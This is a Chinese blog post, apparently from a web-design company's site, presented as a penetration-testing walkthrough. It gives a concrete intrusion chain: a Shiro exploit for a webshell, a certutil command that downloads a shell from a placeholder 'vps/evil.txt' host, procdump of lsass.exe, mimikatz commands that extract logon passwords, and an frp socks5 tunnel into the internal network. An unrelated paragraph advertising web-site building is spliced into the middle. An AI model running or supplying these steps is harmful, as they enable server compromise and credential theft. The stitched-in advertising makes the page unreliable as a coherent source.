本篇內(nèi)容介紹了“如何理解滲透測試流程：getshell，內(nèi)存提取密碼，內(nèi)網(wǎng)滲透”的有關(guān)知識，在實際案例的操作過程中，不少人都會遇到這樣的困境，接下來就讓小編帶領(lǐng)大家學(xué)習(xí)一下如何處理這些情況吧！希望大家仔細閱讀，能夠?qū)W有所成！

成都創(chuàng)新互聯(lián)公司-專業(yè)網(wǎng)站定制、快速模板網(wǎng)站建設(shè)、高性價比南皮網(wǎng)站開發(fā)、企業(yè)建站全套包干低至880元,成熟完善的模板庫,直接使用。一站式南皮網(wǎng)站制作公司更省心,省錢,快速模板網(wǎng)站建設(shè)找我們，業(yè)務(wù)覆蓋南皮地區(qū)。費用合理售后完善，十多年實體公司更值得信賴。

思路：

通過shiro框架漏洞拿到webshell——上傳相關(guān)工具procdump.exe讀取內(nèi)存并導(dǎo)出為dmp文件——使用mimikatz進行密碼破解——用frp進行反向代理——使用破解的賬戶密碼登錄服務(wù)器。

測試過程：

通過shiro工具進行測試：關(guān)于shiro和工具參考：https://www.cnblogs.com/xiaozi/p/13239046.html

獲取webshell,有些時候如果獲取不到可以通過遠程下載的辦法下載shell:certutil -urlcache -split -f http://vps/evil.txt test.jsp

上傳procdump.exe

下載地址：https://docs.microsoft.com/zh-cn/sysinternals/downloads/procdump

執(zhí)行命令：procdump64.exe -accepteula -ma lsass.exe

說明：lsass.exe是windows系統(tǒng)的一個重要進程，里面存著（登錄過的）系統(tǒng)賬戶和密碼

把dmp文件下載下來，使用mimikatz進行密碼破解：

先導(dǎo)入dmp文件，命令：sekurlsa::minidump lass*.dmp

讀取賬戶密碼，命令：sekurlsa::logonpasswords

然后搭建frp梯子：

實戰(zhàn)還是多用用plugin = socks5,這個參數(shù)可以幫你進行全局代理。

用拿到的賬號密碼登錄服務(wù)器：

“如何理解滲透測試流程：getshell，內(nèi)存提取密碼，內(nèi)網(wǎng)滲透”的內(nèi)容就介紹到這里了，感謝大家的閱讀。如果想了解更多行業(yè)相關(guān)的知識可以關(guān)注創(chuàng)新互聯(lián)網(wǎng)站，小編將為大家輸出更多高質(zhì)量的實用文章！